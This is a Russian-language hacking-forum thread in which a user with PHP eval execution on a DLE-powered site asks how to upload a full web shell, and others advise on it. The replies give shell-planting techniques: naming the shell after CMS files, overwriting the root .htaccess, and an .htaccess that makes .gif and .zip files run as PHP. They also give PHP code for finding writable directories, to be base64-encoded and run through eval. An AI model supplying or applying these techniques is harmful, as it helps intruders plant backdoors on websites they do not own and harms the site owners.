HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.09.2017, 11:44
smiles4you
Guest
Сообщений: n/a
Провел на форуме:
796

Репутация: 0
По умолчанию

Добрый день. В пхп не силен, но требуется помощь. Есть сайт на дле, есть вывод eval phpinfo();

url_fopen on

url_include off

Есть папка под запись, но есть и хтацес в корне с отключением обработки пхп пхтмл и т.д. в этой папке. Локальный инклуд "помогает" сделать Hacking attempt!.

Можете подсказать как залить полноценный шелл?
 
Ответить с цитированием

  #2  
Старый 16.09.2017, 13:47
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Попробуйте залить шелл в папку /tmp (если не включен open_basedir) и затем сделайте include его через rce уязвимость которую нашли, да и вряд ли в корне лежал бы файл в котором заблокирована обработка РНР, как же тогда работает сайт, скорее всего там указано, что только для файлов у которых название совпадает с файлами CMS DLE разрешено использование РНР (попадался такой случай), попробуйте назвать свой шелл так же, но в другой папке, дабы не затереть существующий файл, например залить в /engine/ajax/init.php или /engine/ajax/engine.php. Но это только догадки, предоставьте больше информации...
 
Ответить с цитированием

  #3  
Старый 17.09.2017, 15:27
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от smiles4you  
smiles4you said:

Добрый день. В пхп не силен, но требуется помощь. Есть сайт на дле, есть вывод eval phpinfo();
url_fopen on
url_include off
Есть папка под запись, но есть и хтацес в корне с отключением обработки пхп пхтмл и т.д. в этой папке. Локальный инклуд "помогает" сделать Hacking attempt!.
Можете подсказать как залить полноценный шелл?
как вариант переписать корневой htaccess, т.е сначала его читаете, убираете нужные записи, а потом перезаписываете, второй как вариант можно попробовать залить шел с названием index.php к примеру в папку /img и потом так и обратитесь к шелу site.us/img/, т.е при обращение к папке по умолчанию интерпретируются индексные файлы....
 
Ответить с цитированием

  #4  
Старый 18.09.2017, 11:18
smiles4you
Guest
Сообщений: n/a
Провел на форуме:
796

Репутация: 0
По умолчанию

Суть в том что ничего кроме этой папки под запись нет. На счет обработки пхп, думал одно написал другое) Разрешены только индекс.пхп и админ.пхп.
 
Ответить с цитированием

  #5  
Старый 18.09.2017, 11:35
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Попробуйте тогда в ту папку залить htaccess c содержымым:

Цитата:
Сообщение от None  
Options All -Indexes

php_flag engine 1

php_flag engine 1

AddHandler php5-script .php
AddHandler php5-script .gif
Options +ExecCGI
AddType text/html .shtml
AddHandler server-parsed .shtml

AddType application/x-httpd-php .fla
AddType application/x-httpd-php .phtml
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .zip
AddType application/x-httpd-php .php

 
Ответить с цитированием

  #6  
Старый 22.09.2017, 21:54
smiles4you
Guest
Сообщений: n/a
Провел на форуме:
796

Репутация: 0
По умолчанию

Тоже не проканало. Другой вопрос. Есть возможность через евал запрос вывести список файлов и папок под запись? Или хотя бы метод работы через if.

В смысле print, copy, phpinfo() работает а вот если if то уже фиг) А как без if работь хотя бы с if_writable?
 
Ответить с цитированием

  #7  
Старый 25.11.2017, 16:44
gena ryzhov
Guest
Сообщений: n/a
Провел на форуме:
4684

Репутация: 0
По умолчанию

Цитата:
Сообщение от smiles4you  
smiles4you said:

Тоже не проканало. Другой вопрос. Есть возможность через евал запрос вывести список файлов и папок под запись? Или хотя бы метод работы через if.
В смысле print, copy, phpinfo() работает а вот если if то уже фиг) А как без if работь хотя бы с if_writable?
Через евал можно все что угодно!
 
Ответить с цитированием

  #8  
Старый 25.11.2017, 17:19
gena ryzhov
Guest
Сообщений: n/a
Провел на форуме:
4684

Репутация: 0
По умолчанию

Цитата:
Сообщение от gena ryzhov  
gena ryzhov said:

Через евал можно все что угодно!
Попробуй такой код:

function scan_dir($dirname) {

$dir = opendir($dirname);

while (($file = readdir($dir)) !== false) {

if ($file != "." && $file != "..") {

$file_name = rtrim($dirname,'/')."/".$file;

if (is_dir($file_name)) {

if(is_writeable($file_name)) {

echo "Dir writeable - ".realpath($file_name)."
\n";

}

scan_dir($file_name);

}

}

}

closedir($dir);

}

scan_dir($_SERVER['DOCUMENT_ROOT']);


только заверни его в base64_decode() и закинь в евал!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ